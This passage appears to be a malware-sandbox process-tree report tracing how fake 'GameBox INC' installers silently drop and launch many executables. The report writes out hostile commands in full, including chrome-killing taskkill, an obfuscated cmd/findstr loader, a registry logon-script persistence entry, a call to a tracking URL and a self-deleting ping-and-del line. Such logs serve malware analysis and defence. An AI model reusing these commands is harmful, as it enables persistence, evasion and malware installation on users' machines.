                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1156
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7308
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1300
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7056
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Enumerates connected drives
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:648
                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274932 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                6⤵
                                                                                  PID:3512
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                5⤵
                                                                                  PID:1188
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JKUCJ.tmp\WEATHER Manager.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JKUCJ.tmp\WEATHER Manager.tmp" /SL5="$10302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:2000
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-19V8F.tmp\Setup.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-19V8F.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                      7⤵
                                                                                        PID:6196
                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-19V8F.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-19V8F.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274932 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                          8⤵
                                                                                            PID:5412
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4348
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                        6⤵
                                                                                          PID:7304
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /f /im chrome.exe
                                                                                            7⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:7848
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4116
                                                                                        • C:\Users\Admin\AppData\Roaming\1245872.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\1245872.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5772
                                                                                        • C:\Users\Admin\AppData\Roaming\5651374.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\5651374.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                          PID:5888
                                                                                        • C:\Users\Admin\AppData\Roaming\3365839.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\3365839.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5980
                                                                                        • C:\Users\Admin\AppData\Roaming\7771341.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\7771341.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4044
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4220
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5960
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks computer location settings
                                                                                        PID:5020
                                                                                        • C:\Users\Admin\Documents\_iZ11ZpLT73OGRdqKQbNCK3w.exe
                                                                                          "C:\Users\Admin\Documents\_iZ11ZpLT73OGRdqKQbNCK3w.exe"
                                                                                          6⤵
                                                                                            PID:6488
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IM0SU.tmp\_iZ11ZpLT73OGRdqKQbNCK3w.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IM0SU.tmp\_iZ11ZpLT73OGRdqKQbNCK3w.tmp" /SL5="$9006C,138429,56832,C:\Users\Admin\Documents\_iZ11ZpLT73OGRdqKQbNCK3w.exe"
                                                                                              7⤵
                                                                                                PID:7072
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-88VR1.tmp\Setup.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-88VR1.tmp\Setup.exe" /Verysilent
                                                                                                  8⤵
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:6484
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                    9⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Modifies system certificate store
                                                                                                    PID:7560
                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274932 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                      10⤵
                                                                                                        PID:5520
                                                                                              • C:\Users\Admin\Documents\l9PnA_q7vf04DomvIyAvOPVe.exe
                                                                                                "C:\Users\Admin\Documents\l9PnA_q7vf04DomvIyAvOPVe.exe"
                                                                                                6⤵
                                                                                                  PID:6464
                                                                                                  • C:\Users\Admin\Documents\l9PnA_q7vf04DomvIyAvOPVe.exe
                                                                                                    "C:\Users\Admin\Documents\l9PnA_q7vf04DomvIyAvOPVe.exe"
                                                                                                    7⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:8840
                                                                                                • C:\Users\Admin\Documents\T4UJtdQcExliyY2qnEzh2q3_.exe
                                                                                                  "C:\Users\Admin\Documents\T4UJtdQcExliyY2qnEzh2q3_.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6456
                                                                                                • C:\Users\Admin\Documents\ATd6qY4Wsy28ED2oDooFAnfX.exe
                                                                                                  "C:\Users\Admin\Documents\ATd6qY4Wsy28ED2oDooFAnfX.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6440
                                                                                                • C:\Users\Admin\Documents\sVqprzzMWbseHB1BUc5VxEhP.exe
                                                                                                  "C:\Users\Admin\Documents\sVqprzzMWbseHB1BUc5VxEhP.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6432
                                                                                                • C:\Users\Admin\Documents\E47iwsVV3ixpRvQsaWylVIhQ.exe
                                                                                                  "C:\Users\Admin\Documents\E47iwsVV3ixpRvQsaWylVIhQ.exe"
                                                                                                  6⤵
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:6424
                                                                                                • C:\Users\Admin\Documents\GPMntcv2uz_AYgm0HmSZgStF.exe
                                                                                                  "C:\Users\Admin\Documents\GPMntcv2uz_AYgm0HmSZgStF.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6416
                                                                                                • C:\Users\Admin\Documents\iZnyML9dTsVdWn7IYu4T11Md.exe
                                                                                                  "C:\Users\Admin\Documents\iZnyML9dTsVdWn7IYu4T11Md.exe"
                                                                                                  6⤵
                                                                                                    PID:6408
                                                                                                  • C:\Users\Admin\Documents\YgTCEXBc7ygJpYzFKAz0FOS9.exe
                                                                                                    "C:\Users\Admin\Documents\YgTCEXBc7ygJpYzFKAz0FOS9.exe"
                                                                                                    6⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:6400
                                                                                                    • C:\Users\Admin\Documents\YgTCEXBc7ygJpYzFKAz0FOS9.exe
                                                                                                      C:\Users\Admin\Documents\YgTCEXBc7ygJpYzFKAz0FOS9.exe
                                                                                                      7⤵
                                                                                                        PID:2140
                                                                                                    • C:\Users\Admin\Documents\J6aeH9pUG6AXDhASs44AoNN1.exe
                                                                                                      "C:\Users\Admin\Documents\J6aeH9pUG6AXDhASs44AoNN1.exe"
                                                                                                      6⤵
                                                                                                        PID:6392
                                                                                                        • C:\Users\Admin\AppData\Roaming\6671971.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\6671971.exe"
                                                                                                          7⤵
                                                                                                            PID:6544
                                                                                                          • C:\Users\Admin\AppData\Roaming\3522599.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\3522599.exe"
                                                                                                            7⤵
                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                            PID:1324
                                                                                                        • C:\Users\Admin\Documents\7fdiNKglRZk9msns8sl4aC0K.exe
                                                                                                          "C:\Users\Admin\Documents\7fdiNKglRZk9msns8sl4aC0K.exe"
                                                                                                          6⤵
                                                                                                            PID:6384
                                                                                                            • C:\Users\Admin\Documents\7fdiNKglRZk9msns8sl4aC0K.exe
                                                                                                              "C:\Users\Admin\Documents\7fdiNKglRZk9msns8sl4aC0K.exe" -q
                                                                                                              7⤵
                                                                                                                PID:3140
                                                                                                            • C:\Users\Admin\Documents\u1V31UTva2yisMJCa_SxRN7x.exe
                                                                                                              "C:\Users\Admin\Documents\u1V31UTva2yisMJCa_SxRN7x.exe"
                                                                                                              6⤵
                                                                                                                PID:6372
                                                                                                              • C:\Users\Admin\Documents\9ordxN4oRaoNcaqOCuZVGe7p.exe
                                                                                                                "C:\Users\Admin\Documents\9ordxN4oRaoNcaqOCuZVGe7p.exe"
                                                                                                                6⤵
                                                                                                                  PID:6364
                                                                                                                • C:\Users\Admin\Documents\YFvf0_PdCn9nBk5u1noK6cHM.exe
                                                                                                                  "C:\Users\Admin\Documents\YFvf0_PdCn9nBk5u1noK6cHM.exe"
                                                                                                                  6⤵
                                                                                                                    PID:6356
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 792
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Program crash
                                                                                                                      PID:1188
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 796
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:7912
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 824
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6100
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 956
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:7364
                                                                                                                  • C:\Users\Admin\Documents\Ru0B084CuZHtEkuL6zhTCFAW.exe
                                                                                                                    "C:\Users\Admin\Documents\Ru0B084CuZHtEkuL6zhTCFAW.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:6348
                                                                                                                    • C:\Users\Admin\Documents\Ru0B084CuZHtEkuL6zhTCFAW.exe
                                                                                                                      C:\Users\Admin\Documents\Ru0B084CuZHtEkuL6zhTCFAW.exe
                                                                                                                      7⤵
                                                                                                                        PID:6256
                                                                                                                    • C:\Users\Admin\Documents\4W8Ng3XOLLENB2FHUm2uayrd.exe
                                                                                                                      "C:\Users\Admin\Documents\4W8Ng3XOLLENB2FHUm2uayrd.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:6340
                                                                                                                      • C:\Users\Admin\Documents\4W8Ng3XOLLENB2FHUm2uayrd.exe
                                                                                                                        C:\Users\Admin\Documents\4W8Ng3XOLLENB2FHUm2uayrd.exe
                                                                                                                        7⤵
                                                                                                                          PID:7012
                                                                                                                      • C:\Users\Admin\Documents\o2FYi8mcu9zmz0XmA8LxnkIs.exe
                                                                                                                        "C:\Users\Admin\Documents\o2FYi8mcu9zmz0XmA8LxnkIs.exe"
                                                                                                                        6⤵
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:6332
                                                                                                                      • C:\Users\Admin\Documents\NjGXBcIHer9ToAZ7g2b2xvt7.exe
                                                                                                                        "C:\Users\Admin\Documents\NjGXBcIHer9ToAZ7g2b2xvt7.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6324
                                                                                                                      • C:\Users\Admin\Documents\jDxc8oXlaUlRLFNX1BMNiQ_B.exe
                                                                                                                        "C:\Users\Admin\Documents\jDxc8oXlaUlRLFNX1BMNiQ_B.exe"
                                                                                                                        6⤵
                                                                                                                          PID:6656
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4408
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp33DD_tmp.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\tmp33DD_tmp.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4660
                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                            "C:\Windows\System32\dllhost.exe"
                                                                                                                            7⤵
                                                                                                                              PID:6448
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                              7⤵
                                                                                                                                PID:6580
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd
                                                                                                                                  8⤵
                                                                                                                                    PID:7832
                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                      9⤵
                                                                                                                                        PID:7340
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        Esplorarne.exe.com i
                                                                                                                                        9⤵
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:8524
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                          10⤵
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:8396
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            11⤵
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:8824
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                              12⤵
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              PID:8704
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                13⤵
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:7876
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  14⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:5352
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    15⤵
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:5144
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      16⤵
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:6376
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        17⤵
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:6996
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          18⤵
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:6928
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            19⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:7652
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              20⤵
                                                                                                                                                              • Drops startup file
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:6208
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                21⤵
                                                                                                                                                                  PID:4484
                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          ping RJMQBVDN -n 30
                                                                                                                                          9⤵
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:8848
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5032
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:4560
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3368
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2660
                                                                                                                          • C:\Users\Admin\Documents\0zm_Y4Dg4qZpVzEQ8s1xl8dC.exe
                                                                                                                            "C:\Users\Admin\Documents\0zm_Y4Dg4qZpVzEQ8s1xl8dC.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4212
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 784
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5288
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 760
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4432
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 816
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5824
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 824
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:6024
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 956
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5136
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 984
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5512
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1048
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5780
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1352
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5408
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1404
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:4840
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1456
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5588
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1660
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              PID:6792
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 900
                                                                                                                              3⤵
                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                              • Program crash
                                                                                                                              PID:7092
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-50GOP.tmp\Inlog.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-50GOP.tmp\Inlog.tmp" /SL5="$8007A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:4804
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-5QD1D.tmp\Setup.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-5QD1D.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                            2⤵
                                                                                                                              PID:6476
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-M5FAV.tmp\Setup.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-M5FAV.tmp\Setup.tmp" /SL5="$30452,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-5QD1D.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                3⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:6504
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-AQCDJ.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                  4⤵
                                                                                                                                    PID:208
                                                                                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-AQCDJ.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                      5⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      PID:4916
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                    4⤵
                                                                                                                                      PID:9612
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                        5⤵
                                                                                                                                          PID:9576
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                        4⤵
                                                                                                                                          PID:7328
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-AQCDJ.tmp\{app}\vdi_compiler.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-AQCDJ.tmp\{app}\vdi_compiler"
                                                                                                                                          4⤵
                                                                                                                                            PID:2648
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-AQCDJ.tmp\{app}\vdi_compiler.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:2288
                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  ping localhost -n 4
                                                                                                                                                  6⤵
                                                                                                                                                  • Runs ping.exe
                                                                                                                                                  PID:2772
                                                                                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                              4⤵
